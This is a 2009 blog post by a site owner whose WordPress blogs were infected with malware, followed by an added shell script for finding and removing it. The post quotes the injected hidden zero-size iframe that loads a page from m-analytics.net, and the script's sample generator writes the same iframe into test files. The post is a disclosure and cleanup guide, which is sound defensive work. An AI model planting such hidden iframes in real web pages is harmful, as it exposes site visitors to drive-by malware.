Did you get hit with the m-analytics hack?

June 24th, 2009
by Christopher Kusek (PKGuild)

I received an email the other day saying that I was affected by malware! (WTF?!) Thanks, Zuzia, for the heads up, as I didn’t notice it since I was offline for a bit! :)

I did a little searching on this and all I could find was this: “Help With WordPress Vulnerability”. The problem is more or less indicated by the presence of the following code in your HTML and PHP files!

<iframe src="https://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

To tell you the truth, this is pretty damn annoying! I’m still trying to track down the cause, because it only hit me here (at Bluehost), where I host 7 blogs (yes, all 7 were hit); however, at my other hosting service (iPower), where I host 3 blogs, I was not affected. So I blame Bluehost! :)

One tip (if you have shell access) to fix this is to run:

grep -r m-ana *

Then go through one by one and clean up your fricking files (omfg this sucks!) but I don’t really have the time to write a script for it, nor the scripting skillz around that ;)
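The find-and-clean step above can be scripted. The following is an added example, not part of the original post: it assumes the injected tag sits on a single line, as in the sample shown earlier, and the function names and the `.infected.bak` suffix are hypothetical choices for this sketch.

```shell
#!/bin/sh
# Added example: locate and strip the injected m-analytics.net iframe.
# Assumes the whole tag sits on one line, as in the sample shown in the post.
PATTERN='<iframe[^>]*m-analytics\.net[^>]*>[[:space:]]*</iframe>'
BACKUP_SUFFIX='.infected.bak'   # hypothetical suffix chosen for this example

# Print every file under $1 that contains the injected tag.
# -I skips binary files; our own backups are excluded from the scan.
find_infected() {
    grep -rlIE --exclude="*$BACKUP_SUFFIX" -e "$PATTERN" "$1"
}

# Strip the tag from each infected file under $1, keeping the original
# next to it as a backup so the change can be reviewed or undone.
clean_infected() {
    find_infected "$1" | while IFS= read -r f; do
        cp -p "$f" "$f$BACKUP_SUFFIX" || continue
        # Redirecting into the existing file keeps its owner and mode.
        sed -E "s#$PATTERN##g" "$f$BACKUP_SUFFIX" > "$f"
        echo "cleaned: $f"
    done
}

# Constructed sample: one infected page, one page with a legitimate iframe.
make_sample() {
    mkdir -p "$1/wp-content"
    printf '%s\n' '<?php get_footer(); ?>' \
        '<iframe src="https://m-analytics.net/qaqa/?CONSTRUCTED" width=0 height=0 frameborder=0></iframe>' \
        > "$1/wp-content/footer.php"
    printf '%s\n' '<iframe src="https://example.com/video"></iframe>' \
        > "$1/index.html"
}

# Usage: script DIR        list infected files
#        script DIR clean  strip the tag, leaving *.infected.bak backups
if [ "$#" -ge 1 ]; then
    if [ "${2:-}" = clean ]; then clean_infected "$1"; else find_infected "$1"; fi
fi
```

Backups of PHP files left in the web root may be served as plain text, so move or delete them once the diff has been reviewed. Stripping the tag removes the symptom only; the way the files were modified still has to be found and closed.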

So, if you’ve been affected, clean it up! If you haven’t been, hooray!

Oh, and sorry for anyone annoyed by the ‘malware site’ message popping up when visiting any of my sites!

